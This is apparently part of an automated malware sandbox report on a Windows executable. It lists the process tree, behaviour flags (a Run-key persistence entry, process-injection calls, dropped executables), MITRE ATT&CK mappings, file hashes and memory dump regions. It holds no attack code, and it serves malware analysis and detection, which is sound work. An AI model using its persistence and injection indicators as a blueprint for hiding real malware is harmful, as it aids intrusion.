C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1696

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1872

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1908

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1960

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1468

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2052

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2532

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2556

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2552

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3428

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of UnmapMainImage
PID:3524
- C:\Users\Admin\AppData\Local\Temp\d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe
  "C:\Users\Admin\AppData\Local\Temp\d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe"
  2⤵
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4380
- - C:\Users\Admin\AppData\Local\Temp\$770fe406
    "C:\Users\Admin\AppData\Local\Temp\$770fe406"
    3⤵
    - Executes dropped EXE
    PID:3232
- - C:\Users\Admin\AppData\Local\Temp\$7718874d
    "C:\Users\Admin\AppData\Local\Temp\$7718874d"
    3⤵
    - Executes dropped EXE
    PID:3104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3640

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3844

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4004

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4180

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4520

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:1032

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2120

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1892

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1928

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4044

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3412

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4568

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:2172

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4980

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:2068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:3624

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:3620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\$770fe406

Filesize
219KB

MD5
8816d5e592685626fbbfdb1b1b309d79

SHA1
650de5fc16a287c7801742ec92a2cc1ae7fcf4e8

SHA256
d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad

SHA512
323dcf2b6de01767912a05abb93f97c12667b450ad97274babdb8b58248b36c6578e249aec1066bb8afe9568fe450e54795458149d53b71204e312bb8c90bf7f

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_22pdsv15.4np.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3076-5115-0x00007FFADAC50000-0x00007FFADB711000-memory.dmp

Filesize
10.8MB

Download
memory/3076-4920-0x00000214B5920000-0x00000214B594A000-memory.dmp

Filesize
168KB

Download
memory/3076-4919-0x00007FFADAC50000-0x00007FFADB711000-memory.dmp

Filesize
10.8MB

Download
memory/3076-4918-0x00007FFADAC50000-0x00007FFADB711000-memory.dmp

Filesize
10.8MB

Download
memory/3076-4913-0x000002149B2A0000-0x000002149B2C2000-memory.dmp

Filesize
136KB

Download
memory/3076-4911-0x00007FFADAC50000-0x00007FFADB711000-memory.dmp

Filesize
10.8MB

Download
memory/3076-4909-0x00007FFADAC50000-0x00007FFADB711000-memory.dmp

Filesize
10.8MB

Download
memory/3076-4903-0x00007FFADAC53000-0x00007FFADAC55000-memory.dmp

Filesize
8KB

Download
memory/3232-4902-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4380-67-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-19-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-69-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-0-0x000000007536E000-0x000000007536F000-memory.dmp

Filesize
4KB

Download
memory/4380-65-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-61-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-59-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-57-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-55-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-53-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-51-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-49-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-47-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-45-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-43-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-41-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-37-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-31-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-29-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-27-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-25-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-23-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-35-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-63-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-17-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-15-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-13-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-6-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-4892-0x0000000075360000-0x0000000075B10000-memory.dmp

Filesize
7.7MB

Download
memory/4380-4893-0x0000000005D70000-0x0000000005DFC000-memory.dmp

Filesize
560KB

Download
memory/4380-4894-0x0000000006120000-0x000000000616C000-memory.dmp

Filesize
304KB

Download
memory/4380-39-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-33-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-21-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-7-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-11-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-4910-0x000000007536E000-0x000000007536F000-memory.dmp

Filesize
4KB

Download
memory/4380-9-0x0000000007700000-0x000000000794A000-memory.dmp

Filesize
2.3MB

Download
memory/4380-5-0x00000000079F0000-0x0000000007A82000-memory.dmp

Filesize
584KB

Download
memory/4380-4917-0x0000000075360000-0x0000000075B10000-memory.dmp

Filesize
7.7MB

Download
memory/4380-4-0x0000000007F00000-0x00000000084A4000-memory.dmp

Filesize
5.6MB

Download
memory/4380-3-0x0000000007700000-0x0000000007950000-memory.dmp

Filesize
2.3MB

Download
memory/4380-2-0x0000000075360000-0x0000000075B10000-memory.dmp

Filesize
7.7MB

Download
memory/4380-1-0x0000000000990000-0x00000000009CC000-memory.dmp

Filesize
240KB

Download
memory/4380-5642-0x0000000006230000-0x0000000006284000-memory.dmp

Filesize
336KB

Download
memory/4380-5675-0x0000000075360000-0x0000000075B10000-memory.dmp

Filesize
7.7MB

Download